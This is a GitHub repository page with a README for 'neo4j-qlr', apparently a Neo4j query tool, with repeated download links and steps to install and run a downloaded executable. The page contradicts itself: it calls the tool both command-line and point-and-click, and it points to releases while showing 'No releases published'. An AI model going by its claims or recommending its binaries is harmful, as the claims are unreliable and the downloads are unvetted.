Skip to content

πŸ” Query and manage Neo4j databases efficiently with an easy-to-use command line tool, simplifying your graph data interactions.

Notifications You must be signed in to change notification settings

mirochnishenko/neo4j-qlr

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

14 Commits
Β 
Β 
Β 
Β 

Repository files navigation

πŸš€ neo4j-qlr - Access Your Neo4j Database Easily

Download Now

πŸ“˜ Overview

neo4j-qlr is a user-friendly application that simplifies your interactions with the Neo4j database. With an intuitive interface, you can easily run queries and manage your data without any programming knowledge. This application saves you time and makes database management straightforward.

πŸ“¦ System Requirements

To run neo4j-qlr, you need the following:

  • Operating System: Windows 10 or higher / macOS 10.12 Sierra or higher / Linux (any distribution)
  • RAM: Minimum of 4 GB
  • Disk Space: At least 100 MB available
  • Neo4j Database: You should have Neo4j version 3.5 or higher installed.

πŸš€ Getting Started

Step 1: Download the Application

To get started, visit the Releases page to download the application. Click the button below:

Download Now

Step 2: Select the Right Version

On the Releases page, you will see several versions of neo4j-qlr. Choose the latest stable release for the best experience. Download the file that matches your operating system.

Step 3: Install the Application

After downloading, follow these steps based on your operating system:

  • Windows:

    1. Locate the downloaded file (it should be a .exe file).
    2. Double-click on the file to start the installation.
    3. Follow the on-screen instructions.
  • macOS:

    1. Find the downloaded .dmg file.
    2. Double-click it to open.
    3. Drag the neo4j-qlr icon into your Applications folder.
  • Linux:

    1. Open your terminal.
    2. Navigate to the downloaded directory.
    3. Run the installation script with the command: chmod +x neo4j-qlr && ./neo4j-qlr.

Step 4: Launch the Application

  • After installation, find the neo4j-qlr icon in your applications.
  • Double-click the icon to launch the application.

Step 5: Connect to Your Neo4j Database

  1. Upon launching, you will see a connection setup screen.
  2. Enter the connection details for your Neo4j database:
    • Host: Typically localhost.
    • Port: Default is 7687.
    • Username: Enter your Neo4j username.
    • Password: Enter your Neo4j password.
  3. Click the β€œConnect” button to establish a connection.

Step 6: Start Querying

After connecting, you will see a text area where you can run your queries. Type in your Cypher query and click the β€œRun” button to see results instantly.

πŸ“₯ Download & Install

Make sure to download the application from the following link:

Download Now

πŸ”§ Features

  • User-Friendly Interface: No technical skills required. Simply point and click.
  • Real-Time Results: Execute queries and see results instantly.
  • Support for Multiple Databases: Easily switch between different Neo4j databases.
  • Query Templates: Use built-in templates to get started quickly.

πŸ› οΈ Troubleshooting

If you encounter any issues:

  • Ensure that Neo4j is running properly on your machine.
  • Check your network settings if you are connecting to a remote database.
  • Visit the Issues page for common problems and solutions.

πŸ“ Contribution

We welcome contributions. If you have suggestions, comments, or bug reports, please open an issue. For those who want to contribute code, please fork the repo and create a pull request.

πŸ—£οΈ Community

Join our community for help and discussions. Connect with other users on GitHub Discussions.

πŸ“œ License

This project is licensed under the MIT License. See the LICENSE file for details.


Your journey with neo4j-qlr begins now. Happy querying!

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •